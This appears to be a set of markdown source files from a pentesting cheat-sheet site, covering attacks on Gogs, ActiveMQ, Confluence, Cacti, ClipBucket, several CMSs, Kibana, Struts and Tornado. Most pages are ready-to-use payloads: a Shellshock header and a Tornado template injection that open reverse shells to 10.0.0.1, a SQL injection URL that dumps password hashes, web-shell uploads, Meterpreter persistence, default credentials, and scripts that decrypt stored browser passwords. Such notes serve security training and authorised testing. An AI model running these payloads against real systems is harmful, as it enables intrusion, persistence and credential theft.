34 | -------------------------------------------------------------------------------- /src/exploit/steganography/_data.yml: -------------------------------------------------------------------------------- 1 | category1: steganography 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/steganography/morse-image-reading.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Morse Image Reading 3 | description: If a picture is morse code, we can read it and translate to human readable strings. 4 | tags: 5 | - Steganography 6 | refs: 7 | - https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG 8 | date: 2023-07-14 9 | draft: false 10 | --- 11 | 12 | ## Morse OCR 13 | 14 | [morse-ocr](https://github.com/eauxfolles/morse-ocr) is an useful Python script to read and translate morse code from picture. 15 | 16 | ```bash 17 | python3 mocr.py example.png 18 | ``` 19 | -------------------------------------------------------------------------------- /src/exploit/tool/_data.yml: -------------------------------------------------------------------------------- 1 | category1: tool 2 | related_menus: 3 | - title: Virtual Machine 4 | id: virtual-machine 5 | - title: Others 6 | id: others -------------------------------------------------------------------------------- /src/exploit/tool/metasploit-cheat-sheets.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Metasploit Cheat Sheets 3 | description: 4 | tags: 5 | - Linux 6 | - Windows 7 | refs: 8 | date: 2023-01-07 9 | draft: false 10 | --- 11 | 12 | ## Msfconsole 13 | 14 | No content yet. 15 | 16 |
17 | 18 | ## Meterpreter 19 | 20 | ```sh 21 | # List all sessions running on background 22 | msf> sessions 23 | 24 | # Start interacting with the session 25 | msf> sessions 26 | 27 | # Drop into a system command shell 28 | meterpreter> shell 29 | # Upgrade to full functional shell 30 | python3 -c 'import pty;pty.spawn("/bin/bash")' 31 | 32 | # Persistence at the target system 33 | # -h: Help 34 | meterpreter> run persistence -h 35 | # -U: Automatically start when the user logs on 36 | # -i: The interal in seconds between each connection attempt 37 | # -p: The port on which the system running Metesploit is listening 38 | # -r: The IP of the system running Metasploit listening for the connect back 39 | meterpreter> run persistence -U -i 5 -p 443 -r 40 | ``` 41 | 42 |
43 | 44 | ## Msfvenom 45 | 46 | No content yet. 47 | -------------------------------------------------------------------------------- /src/exploit/tool/virtual-machine/_data.yml: -------------------------------------------------------------------------------- 1 | category2: virtual-machine -------------------------------------------------------------------------------- /src/exploit/tool/virtual-machine/vm-escape.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: VM (Virtual Machine) Escape 3 | description: 4 | tags: 5 | - Virtual Machine 6 | refs: 7 | date: 2024-05-21 8 | draft: false 9 | --- 10 | 11 | ## Shared Folder 12 | 13 | If the VM admin sets a folder containing sensitive files as Shared Folder, we can get sensitive information by getting into the folder. 14 | 15 | ### VirtualBox 16 | 17 | ```bash 18 | # Linux 19 | cd /media/sf_ 20 | 21 | # Windows 22 | cd \\VBOXSVR\\ 23 | ``` 24 | 25 | ### VMWare 26 | 27 | ```bash 28 | # Linux 29 | cd /mnt/vmhgs/ 30 | 31 | # Windows 32 | cd \\vmware-host\Shared Folder\ 33 | ``` 34 | -------------------------------------------------------------------------------- /src/exploit/version-control/_data.yml: -------------------------------------------------------------------------------- 1 | category1: version_control 2 | related_menus: 3 | - title: Git 4 | id: git -------------------------------------------------------------------------------- /src/exploit/version-control/git/_data.yml: -------------------------------------------------------------------------------- 1 | category2: git -------------------------------------------------------------------------------- /src/exploit/version-control/git/create-git-local-server.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Create Git Local Server 3 | description: 4 | tags: 5 | - Git 6 | refs: 7 | - https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols 8 | date: 2023-11-05 9 | draft: false 10 | --- 11 | 12 | ## Start Local Git Server (Dumb, HTTP) 13 | 14 | ```bash 15 | cd test_repo 16 | git init 17 | git add . && git commit -m "first commit" 18 | cd .git 19 | # Update auxiliary info file to help dumb server. 20 | # --bare: Bare repository (does not have a working directory) 21 | git --bare update-server-info 22 | cd .. 23 | python3 -m http.server 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/version-control/git/gogs-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gogs Pentesting 3 | description: Gogs (Go Git Service) is a painless self-hosted Git Service. 4 | tags: 5 | - Git 6 | - SQL Injection 7 | - Web 8 | refs: 9 | date: 2023-04-27 10 | draft: false 11 | --- 12 | 13 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238)) 14 | 15 | ```txt 16 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- 17 | ``` 18 | 19 | ### Automation 20 | 21 | ```bash 22 | sqlmap -u "https://example.com/api/v1/repos/search?q=test" 23 | sqlmap -u "https://example.com/api/v1/users/search?q=test" 24 | ``` 25 | 26 |
27 | 28 | ## Git Hooks Remote Code Execution (RCE) 29 | 30 | ```bash 31 | msfconsole 32 | msf> use exploit/multi/http/gogs_git_hooks_rce 33 | msf> (set options...) 34 | msf> run 35 | ``` -------------------------------------------------------------------------------- /src/exploit/web/_data.yml: -------------------------------------------------------------------------------- 1 | category1: web 2 | related_menus: 3 | - title: Method 4 | id: method 5 | - title: Security Risk 6 | id: security-risk 7 | - title: Cookie 8 | id: cookie 9 | - title: CMS 10 | id: cms 11 | - title: Framework 12 | id: framework 13 | - title: Template Engine 14 | id: template-engine 15 | - title: API 16 | id: api 17 | - title: Microsoft 18 | id: microsoft 19 | - title: Tool 20 | id: tool 21 | - title: Others 22 | id: others -------------------------------------------------------------------------------- /src/exploit/web/apache-activemq-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Apache ActiveMQ Pentesting 3 | description: Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-23 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```bash 14 | admin:admin 15 | ``` 16 | 17 |
18 | 19 | ## Interaction with MQTT 20 | 21 | If the MQTT server is runnong on the target system, we can subscribe/publish to a topic in ActiveMQ using MQTT client. 22 | 23 | ### Subscribe to a Topic 24 | 25 | ```bash 26 | # -h: Host 27 | # -t: Topic name 28 | # -V: MQTT protocol version (5, 31, 311) 29 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31 30 | ``` 31 | 32 |
33 | 34 | ## Web Shell by File Upload JSP 35 | 36 | ActiveMQ is vulnerable to web shell via file upload an arbitrary JSP file. 37 | 38 | ```bash 39 | msfconsole 40 | msf> use exploit/multi/http/apache_activemq_upload_jsp 41 | msf> set ... 42 | msf> run 43 | meterpreter> shell 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/web/api/_data.yml: -------------------------------------------------------------------------------- 1 | category2: api -------------------------------------------------------------------------------- /src/exploit/web/atlassian-confluence-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Atlassian Confluence Pentesting 3 | description: Atlassian Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Remote Code Execution (CVE-2022-26134) 12 | 13 | Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134). 14 | 15 | ```sh 16 | python3 exploit.py -u http:// -c whoami 17 | ``` 18 | 19 | -------------------------------------------------------------------------------- /src/exploit/web/bookmarklet-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bookmarklet Attack 3 | description: If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet. 4 | tags: 5 | - Web 6 | refs: 7 | - https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/ 8 | date: 2023-06-19 9 | draft: false 10 | --- 11 | 12 | ## Exploitation 13 | 14 | ### Malicious Links 15 | 16 | Attackers induce victims to add their malicious link into the bookmark menu as below. 17 | 18 | ```html 19 |

Drag and drop the following link into the bookmark menu to access easily!

20 | Example.com 21 | ``` 22 | 23 | In addition, if the current website does not set **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can get the victim's cookie and send it to the malicious website as below. 24 | 25 | ```html 26 |

Drag and drop me the following link into the bookmark menu to access easily!

27 | Example.com 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/web/browser-in-the-browser-attack.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Browser in the Browser (BITB) Attack 3 | description: 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-02 8 | draft: false 9 | --- 10 | 11 | ## Use Templates 12 | 13 | [This repository](https://github.com/mrd0x/BITB) is useful for attacking. -------------------------------------------------------------------------------- /src/exploit/web/cacti-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Cacti Pentesting 3 | description: Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application. 4 | tags: 5 | - Web 6 | refs: 7 | - https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169 8 | date: 2023-05-02 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | ```bash 15 | admin:admin 16 | ``` 17 | 18 |
19 | 20 | ## Common Directories 21 | 22 | ```bash 23 | /include/config.php 24 | ``` 25 | 26 |
27 | 28 | ## Remote Code Execution (RCE) CVE-2022-46169 29 | 30 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/) 31 | 32 | ```bash 33 | msfconsole 34 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection 35 | msf> (set options...) 36 | msf> run 37 | ``` 38 | 39 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166). -------------------------------------------------------------------------------- /src/exploit/web/cgi-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CGI Pentesting 3 | description: CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Enumeration CGI Scripts 12 | 13 | ```bash 14 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt 15 | ``` 16 | 17 |
18 | 19 | ## Shellshock 20 | 21 | Shellshock is the vulnerability of bash v1.0.3-4.3 that allows users to execute arbitrary commands. 22 | If we found the CGI script under **`/cgi-bin/`**, modifying HTTP header to remote code execution. 23 | 24 | ```bash 25 | GET /cgi-bin/example.cgi HTTP/1.1 26 | 27 | User-Agent: () { :; }; /bin/bash -c "sleep 5" 28 | Cookie: () { :; }; /bin/bash -c "sleep 5" 29 | 30 | # Reverse Shell 31 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" 32 | ``` -------------------------------------------------------------------------------- /src/exploit/web/clipbucket-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: ClipBucket Pentesting 3 | description: ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-19 8 | draft: false 9 | --- 10 | 11 | ## Arbitrary File Upload < v4.0.0 12 | 13 | ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell. 14 | 15 | ### 1. Prepare Payload 16 | 17 | Create a PHP script to reverse shell in local machine. 18 | 19 | ```bash 20 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php 21 | ``` 22 | 23 | Update $ip and $port with your local ip address and port. 24 | 25 | ### 2. Upload the Payload 26 | 27 | Next upload the above PHP script to the target website. 28 | 29 | ```bash 30 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php" 31 | ``` 32 | 33 | ### 3. Reverse Shell 34 | 35 | In local machine, start a listener. 36 | 37 | ```bash 38 | nc -lvnp 4444 39 | ``` 40 | 41 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**. 42 | We should get a shell. -------------------------------------------------------------------------------- /src/exploit/web/cms/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cms -------------------------------------------------------------------------------- /src/exploit/web/cms/bolt-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bolt CMS Pentesting 3 | description: Bolt is an open-source content managemtn system based on PHP. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | date: 2022-11-22 9 | draft: false 10 | --- 11 | 12 | ## Login Page 13 | 14 | ```sh 15 | /bolt 16 | ``` 17 | 18 |
19 | 20 | ## Remote Code Execution (v3.7.1) 21 | 22 | ```sh 23 | msfconsole 24 | msf> use exploit/unix/webapp/bolt_authenticated_rce 25 | msf> set lhost 26 | msf> set rhosts 27 | msf> set username 28 | msf> set password 29 | msf> run 30 | ``` 31 | -------------------------------------------------------------------------------- /src/exploit/web/cms/cockpit-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Cockpit CMS Pentesting 3 | description: Cockpit CMS is a content management system for publishing contents. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | date: 2023-02-05 9 | draft: false 10 | --- 11 | 12 | ## Enumeration & Remote Code Execution (RCE) & Reverse Shell 13 | 14 | ```bash 15 | # Reset password (CVE-2020-35847) 16 | msf> use exploit/multi/cockpit_cms_rce 17 | msf> set USER admin 18 | msf> run 19 | ``` 20 | 21 |
22 | 23 | ## Version Detection 24 | 25 | Cockpit CMS version is displayed as the value of “data-version” attribute in html tag. 26 | 27 | ```bash 28 | 29 | ``` 30 | 31 |
32 | 33 | ## Common Directories 34 | 35 | ```bash 36 | /auth/check # We can enumerate users using the path 37 | /auth/forgotpassword 38 | /auth/index 39 | /auth/login 40 | /auth/requestreset # We can enumerate users using the path 41 | ``` -------------------------------------------------------------------------------- /src/exploit/web/cms/concrete-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Concrete CMS Pentesting 3 | description: Concrete CMS is a content management system for publishing contents. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | date: 2023-02-05 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | The default username is **“admin”** in Concrete5. -------------------------------------------------------------------------------- /src/exploit/web/cms/fuel-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: FUEL CMS Pentesting 3 | description: FUEL is a content management system (CMS). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## Default Credential 12 | 13 | ```txt 14 | admin:admin 15 | ``` 16 | -------------------------------------------------------------------------------- /src/exploit/web/cms/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: CMS (Content Management System) Pentesting 3 | description: CMS (Content Management System) is computer software used to manage the creation and modification of digital content. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## CMS Detection 12 | 13 | If you don't know which CMS used in target websites, you can detect it using **[Cmseek](https://github.com/Tuhinshubhra/CMSeeK)** which is an automatic CMS detection tool. 14 | 15 | ```sh 16 | cmseek -u vulnerable.com 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/web/cms/mara-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Mara CMS Pentesting 3 | description: Mara CMS is a file based content management system. 4 | tags: 5 | - CMS 6 | - Web 7 | refs: 8 | - https://www.exploit-db.com/exploits/48780 9 | date: 2023-03-07 10 | draft: false 11 | --- 12 | 13 | ## Default Credentials 14 | 15 | ```bash 16 | admin:changeme 17 | ``` 18 | 19 |
20 | 21 | ## Remote Code Execution (RCE) v7.5 22 | 23 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780) 24 | 25 | ### Automation 26 | 27 | ```bash 28 | msfconsole 29 | msf> use exploit/multi/http/maracms_upload_exec 30 | msf> set rhosts 31 | msf> set lhost 32 | msf> set srvhost 33 | msf> set srvport 34 | msf> set targeturi /path/to/maracms/ 35 | msf> set targeturipath /path/to/maracms/ 36 | ``` 37 | -------------------------------------------------------------------------------- /src/exploit/web/cms/subrion-cms-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Subrion CMS Pentesting 3 | description: Subrion is a content management system (CMS). 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-02-20 8 | draft: false 9 | --- 10 | 11 | ## File Upload to Reverse Shell (Credential Required) 12 | 13 | ### 1. Download Reverse Shell Payload 14 | 15 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). And change the file extension to **'.phar'**. 16 | Then start a listener. 17 | 18 | ```sh 19 | nc -lvnp 4444 20 | ``` 21 | 22 | ### 2. Upload the Payload in Subrion Panel 23 | 24 | 1. **Login** 25 | 26 | 2. **Move to Content -> Uploads in Panel** 27 | 28 | 3. **Upload reverse-shell.phar** 29 | 30 | 4. **Access to /subrion/upload/reverse-shell.phar** 31 | 32 | Now you get a shell. -------------------------------------------------------------------------------- /src/exploit/web/code-deobfuscation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Code Deobfuscation 3 | description: This technique make a obfuscated code (such as JavaScript) to be understandable. 4 | tags: 5 | - Web 6 | draft: false 7 | --- 8 | 9 | ## Deobfuscation 10 | 11 | - **JavaScript** 12 | 13 | - **[JavaScript Deobfuscator](https://deobfuscate.io/)** 14 | 15 |
16 | 17 | ## Obfuscation 18 | 19 | 1. **JavaScript** 20 | 21 | - **Manual Obfuscation** 22 | 23 | 1. Access [https://obfuscator.io/](https://obfuscator.io/). 24 | 25 | 2. Change “String Array Encoding” to “Base64”. 26 | 27 | 3. Paste JavaScript code. 28 | 29 | 4. Click "Obfuscate". 30 | 31 | 5. Try running it on [https://jsconsole.com/](https://jsconsole.com/). 32 | 33 | - **Use Online Tools** 34 | 35 | - **[JSFuck](http://www.jsfuck.com/)** 36 | 37 | - **[jjencode](https://utf-8.jp/public/jjencode.html)** 38 | 39 | - **[aaencode](https://utf-8.jp/public/aaencode.html)** 40 | -------------------------------------------------------------------------------- /src/exploit/web/codiad-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Codiad Pentesting 3 | description: Codiad is a web-based IDE framework. 4 | tags: 5 | - Web 6 | refs: 7 | - https://www.exploit-db.com/exploits/49705 8 | date: 2023-02-26 9 | draft: false 10 | --- 11 | 12 | ## Default Credentials 13 | 14 | ```sh 15 | # Docker image - https://hub.docker.com/r/bitnami/codiad 16 | user:bitnami 17 | ``` 18 | 19 |
20 | 21 | ## Enumeration 22 | 23 | ```bash 24 | # Get current directory in the system 25 | /components/project/controller.php?action=get_current 26 | ``` 27 | 28 |
29 | 30 | ## Remote Code Execution (RCE) v2.8.4 31 | 32 | ```bash 33 | wget https://www.exploit-db.com/exploits/49705 -O exploit.py 34 | 35 | # Linux 36 | python3 exploit.py https://example.com/ admin admin 4444 linux 37 | # Windows 38 | python3 exploit.py https://example.com/ admin admin 4444 windows 39 | ``` 40 | -------------------------------------------------------------------------------- /src/exploit/web/cookie/_data.yml: -------------------------------------------------------------------------------- 1 | category2: cookie -------------------------------------------------------------------------------- /src/exploit/web/cookie/session-fixation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Session Fixation 3 | description: Session fixation attacks attempt to exploit the vulnerability of a system that allows one person to fixate another person’s session identifier. 4 | tags: 5 | - Cookie 6 | - Web 7 | refs: 8 | - https://owasp.org/www-community/attacks/Session_fixation 9 | date: 2023-04-15 10 | draft: false 11 | --- 12 | 13 | ## Exploitation 14 | 15 | ### 1. Attacker Logins Website to Get the Session 16 | 17 | An attacker need to login to a legitimate website then get the session value. 18 | 19 | ```bash 20 | Cookie: sessid=abcdef 21 | ``` 22 | 23 | ### 2. Attacker Sends the Session Value to Victim 24 | 25 | There are various way to send the attacker’s session value. For example, 26 | 27 | - Send email. 28 | - Predict a session value. 29 | - Eavesdrop a session using packet sniffer such as Wireshark. 30 | - XSS 31 | 32 | ```bash 33 | 34 | ``` 35 | 36 | ### 3. Victim Logins with Attacker’s Session 37 | 38 | If the victim logins and attacker’s session is set to the Cookie, the attacker can control the victim’s account in the website. -------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/_data.yml: -------------------------------------------------------------------------------- 1 | category2: elasticsearch -------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/elasticsearch-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Elasticsearch Pentesting 3 | description: It is a search engine based on the Lucene library. Default ports are 9200, 9300. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-12-23 8 | draft: false 9 | --- 10 | 11 | ## Default Credentials 12 | 13 | ```txt 14 | admin:elasticadmin 15 | elastic:changeme 16 | ``` 17 | 18 |
19 | 20 | ## Brute Force Credentials 21 | 22 | Crack the "Authorization" header in the web page. 23 | 24 | ```sh 25 | hydra -L usernames.txt -P passwords.txt -s 9200 http-get / 26 | ``` 27 | 28 |
29 | 30 | ## Common Directories 31 | 32 | ```bash 33 | /_cat/ 34 | /_cat/indices 35 | /_cluster/ 36 | /_nodes/ 37 | /_remote/ 38 | /_security 39 | /_search?q=username 40 | /_search?q=password 41 | /_security/role 42 | /_security/user 43 | /_xpack/security/user/ 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/web/elasticsearch/kibana-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Kibana Pentesting 3 | description: A proprietary data visualization dashboard software for Elasticsearch. A default port is 5601. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-12-22 8 | draft: false 9 | --- 10 | 11 | ## Vulnerabilities 12 | 13 | ### Local File Inclusion (LFI) Version \< 6.4.3 & 5.6.13 14 | 15 | ```sh 16 | curl http://:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt 17 | ``` 18 | 19 | ### Remote Code Execution (RCE) Version \< 6.6.0 20 | 21 | Reference: [https://github.com/mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) 22 | -------------------------------------------------------------------------------- /src/exploit/web/extract-web-browser-passwords.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Extract Web Browser Passwords 3 | description: Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-06-23 8 | draft: false 9 | --- 10 | 11 | ## Firefox 12 | 13 | ```bash 14 | wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py 15 | python3 firefox_decrypt.py 16 | ``` 17 | 18 |
19 | 20 | ## Google Chrome 21 | 22 | ```bash 23 | wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py 24 | python3 decrypt_chrome_password.py 25 | ``` 26 | -------------------------------------------------------------------------------- /src/exploit/web/framework/_data.yml: -------------------------------------------------------------------------------- 1 | category2: framework -------------------------------------------------------------------------------- /src/exploit/web/framework/dotnet/_data.yml: -------------------------------------------------------------------------------- 1 | category3: dotnet -------------------------------------------------------------------------------- /src/exploit/web/framework/dotnet/blazor-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Blazor Pentesting 3 | description: Blazor is a web framework for building interactive web applications using C# instead of JavaScript. 4 | tags: 5 | - .NET 6 | - Web 7 | refs: 8 | date: 2024-11-30 9 | draft: false 10 | --- 11 | 12 | ## Common Directories/Files 13 | 14 | ```bash 15 | # This file contains paths of DLLs that can be reversed. 16 | /_framework/blazor.boot.json 17 | /_framework/.dll 18 | ``` 19 | 20 |
21 | 22 | ## Reverse Engineering DLLs 23 | 24 | We can reverse DLLs such as `/_framework/.dll` using tools such as **DotPeek** for retrieving sensitive information (credentials, software versions, etc.). 25 | 26 | If you use DotPeek, right-click on the name in Assembly Explorer and click **Decompiled Sources** for investigation. -------------------------------------------------------------------------------- /src/exploit/web/framework/java/_data.yml: -------------------------------------------------------------------------------- 1 | category3: java -------------------------------------------------------------------------------- /src/exploit/web/framework/java/ajp-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: AJP (Apache JServ Protocol) Pentesting 3 | description: AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009. 4 | tags: 5 | - AJP 6 | - Web 7 | refs: 8 | date: 2022-11-22 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script ajp-auth -p 8009 16 | nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 17 | nmap --script ajp-brute -p 8009 18 | nmap --script ajp-headers -p 8009 19 | nmap --script ajp-methods -p 8009 20 | nmap --script ajp-request -p 8009 21 | ``` 22 | 23 |

24 | 25 | ## Ghostcat File Inclusion 26 | 27 | It's a vulnerability of **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)). 28 | Use Metasploit for exploiting it. 29 | 30 | ```sh 31 | msfconsole 32 | msf6 > use auxiliary/admin/http/tomcat_ghostcat 33 | msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts 34 | msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit 35 | ``` 36 | -------------------------------------------------------------------------------- /src/exploit/web/framework/java/apache-struts-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Apache Struts Pentesting 3 | description: An open-source web application framework for developing Java EE web applications. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2022-11-22 8 | draft: false 9 | --- 10 | 11 | ## Struts2 OGNL Elavasion 12 | 13 | Metasploit is useful for exploiting. 14 | 15 | ```sh 16 | msfconsole 17 | msf > use multi/http/struts2_content_type_ognl 18 | msf > set payload linux/x86/meterpreter/reverse_tcp 19 | msf > exploit 20 | 21 | meterpreter > shell 22 | SHELL=/bin/bash script -q /dev/null 23 | ``` -------------------------------------------------------------------------------- /src/exploit/web/framework/javascript/_data.yml: -------------------------------------------------------------------------------- 1 | category3: javascript -------------------------------------------------------------------------------- /src/exploit/web/framework/javascript/angular-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Angular Pentesting 3 | description: AngularJS is a web application framework. 4 | tags: 5 | - SSTI 6 | - Web 7 | refs: 8 | date: 2023-07-12 9 | draft: false 10 | --- 11 | 12 | ## HTML Attributes 13 | 14 | If a website uses AngularJS framework, the nodes have a “ng-apps” attribute. So you can check it in a HTML source code. 15 | 16 | ```html 17 |
18 | ``` 19 | 20 |
21 | 22 | ## Server-Side Template Injection (SSTI) 23 | 24 | ```bash 25 | {{2*3}} 26 | {{$on.constructor('alert("test")')()}} 27 | {{constructor.constructor('alert("test")')()}} 28 | 29 | 30 |
31 | ``` 32 | 33 | It worth testing to bypass sanitizing as below. 34 | 35 | ```bash 36 | # Remove one-pair braces 37 | {2*3} 38 | 39 | # Remove all braces 40 | 2*3 41 | 42 | # Add additional braces 43 | {{{2*3}}} 44 | ``` -------------------------------------------------------------------------------- /src/exploit/web/framework/python/_data.yml: -------------------------------------------------------------------------------- 1 | category3: python -------------------------------------------------------------------------------- /src/exploit/web/framework/python/django-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Django Pentesting 3 | description: Django is a web framework in Python. 4 | tags: 5 | - Web 6 | refs: 7 | date: 2023-03-19 8 | draft: false 9 | --- 10 | 11 | ## SSTI (Server-Side Template Injection) 12 | 13 | ```bash 14 | # XSS 15 | {{ `` }} 16 | 17 | # Debug information 18 | {% debug %} 19 | ``` 20 | 21 |

22 | 23 | ## Bypass ALLOWED_HOSTS 24 | 25 | If we get the error **“Invalid HTTP_HOST header: 'x.x.x.x:8000'. You may need to add 'x.x.x.x' to ALLOWED_HOSTS"** when accessing the website written in Django, you need to intercept the value of the Host in the HTTP request header. 26 | Then you should be able to access the website. 27 | 28 | ```bash 29 | Host: 0.0.0.0:8000 30 | # or 31 | Host: 127.0.0.1:8000 32 | ``` 33 | 34 | Or if we can have the permission to edit the configuration of the website, add new IP address to **ALLOWED_HOSTS** in **`settings.py`**. 35 | 36 | ```bash 37 | ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'x.x.x.x'] 38 | ``` 39 | 40 |

41 | 42 | ## Create a New User 43 | 44 | ```bash 45 | python3 manage.py createsuperuser 46 | ``` 47 | -------------------------------------------------------------------------------- /src/exploit/web/framework/python/tornado-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Tornado Pentesting 3 | description: Tornado is a Python web server and web application framework. 4 | tags: 5 | - Web 6 | refs: 7 | - https://ajinabraham.com/blog/server-side-template-injection-in-tornado 8 | date: 2023-05-28 9 | draft: false 10 | --- 11 | 12 | ## Server-Side Template Injection (SSTI) 13 | 14 | We can execute arbitrary Python script using the server-site template injection. 15 | First check if the script will be executed as below. 16 | 17 | ```bash 18 | Website by {{ 2*3 }} 19 | {{ 2*3 }} 20 | 21 | # URL parameters 22 | https://example.com/?q={{2*3}} 23 | ``` 24 | 25 | If the website shows **`6`** instead of **`2*3`**, we can execute arbitrary code. 26 | Try following payloads. 27 | 28 | ```bash 29 | {% import os %}{{ os.popen("whoami").read() }} 30 | 31 | # Reverse shell. Replace "10.0.0.1" with your own ip 32 | # It requires a listener like `nc -lvnp 4444` in local terminal. 33 | {% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }} 34 | ``` 35 | -------------------------------------------------------------------------------- /src/exploit/web/framework/ruby/__data.yml: -------------------------------------------------------------------------------- 1 | category3: ruby -------------------------------------------------------------------------------- 